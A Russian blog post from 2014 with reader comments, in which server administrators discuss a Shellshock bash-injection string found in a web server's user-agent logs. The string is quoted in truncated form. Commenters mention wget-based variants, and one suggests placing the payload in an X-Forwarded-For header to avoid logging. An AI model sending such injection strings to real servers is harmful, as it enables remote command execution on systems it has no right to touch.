@Linda-chan

Linda-chan

Линда Кайе
Linda-chan

Дата рождения: 01.11.1983

Тотальная неудачница и убийца жёстких дисков. Самая большая поклонница Ариэль. Член ордена Вселенского тормоза имени Осаки-сан. Любительница каваййных переднеприводных машинок. Суккуб на полставки. Когти прилагаются.

https://www.lindachan.net

10 я читаю 59 меня читают
16122 постов
26868 комментариев
Linda-chan Linda-chan
01 Oct 2014

программы linux

О, началось в колхозе утро. Прилетел юзерагент:

() { :;}; /bin/bash -c \

Рекомендовано: stanis и ulitkovod
#tupry 24
liuch
01 Oct 2014

У меня урл другой и набор опций для wget, но суть та же.

#tupry/5 в ответ на /1
liuch
01 Oct 2014

При этом на сайт сыплет ошибками mysql. Не подготовились к такому наплыву )

#tupry/6 в ответ на /5
Linda-chan
02 Oct 2014

Кстати, оно влияет на любителей всяких пыхпыхов или на статику тоже?

#tupry/13 в ответ на /1
liuch
02 Oct 2014

Linda-chan, зависит от того как и чем эти данные будут обработаны.

#tupry/16 в ответ на /13
Linda-chan
02 Oct 2014

Самим сервером по формуле: принял запрос, прочитал файл с диска, отправил ответ.

#tupry/21 в ответ на /16
liuch
02 Oct 2014

Linda-chan, А зачем данные об юзерагенте для того что бы прочитать файл статики? Ну разве что для особо извращенных конфигураций где содержимое статики зависит от браузера.

#tupry/23 в ответ на /21
Linda-chan
02 Oct 2014

Не знаю зачем, но мало ли как оно там внутрях устроено.

#tupry/24 в ответ на /23
a1batross
01 Oct 2014

Linda-chan, может мне уже свой баш сделать, который не будет иметь функций внутри переменных >_>

#tupry/2
stanis
01 Oct 2014

И назвать его ash.

#tupry/3 в ответ на /2
Linda-chan
02 Oct 2014

Я только сейчас заглянула в логи. Вероятно там была ротация, и юзерагент засветился только раз.

#tupry/15 в ответ на /4
stanis
01 Oct 2014

А ещё "compatibility package for dash".

#tupry/8 в ответ на /7
stanis
01 Oct 2014

ХакИры. Заклинатели хаков.

#tupry/10 в ответ на /9
liuch
02 Oct 2014

Какие нафиг хакеры? В моем случае даже данные в whois не скрыты. И сайт крутится. С перебоями.

#tupry/20 в ответ на /9
Toyoku-mono
02 Oct 2014

Я имею в виду что будет если сабжевый хак засовывать не в юзерагент а в заголовок X-Forwarded-For - так же по идее менее палевно.

#tupry/19 в ответ на /18
Linda-chan
02 Oct 2014

Если хак попадёт в переменные окружения, то сработает, хотя в логи не попадёт. Тут важно понять, при каких условиях оно попадает в переменные окружения. Пока я поняла только про PHP.

#tupry/22 в ответ на /19

Добавить пост

Вы можете выбрать до 10 файлов общим размером не более 10 МБ.
Для форматирования текста используется Markdown.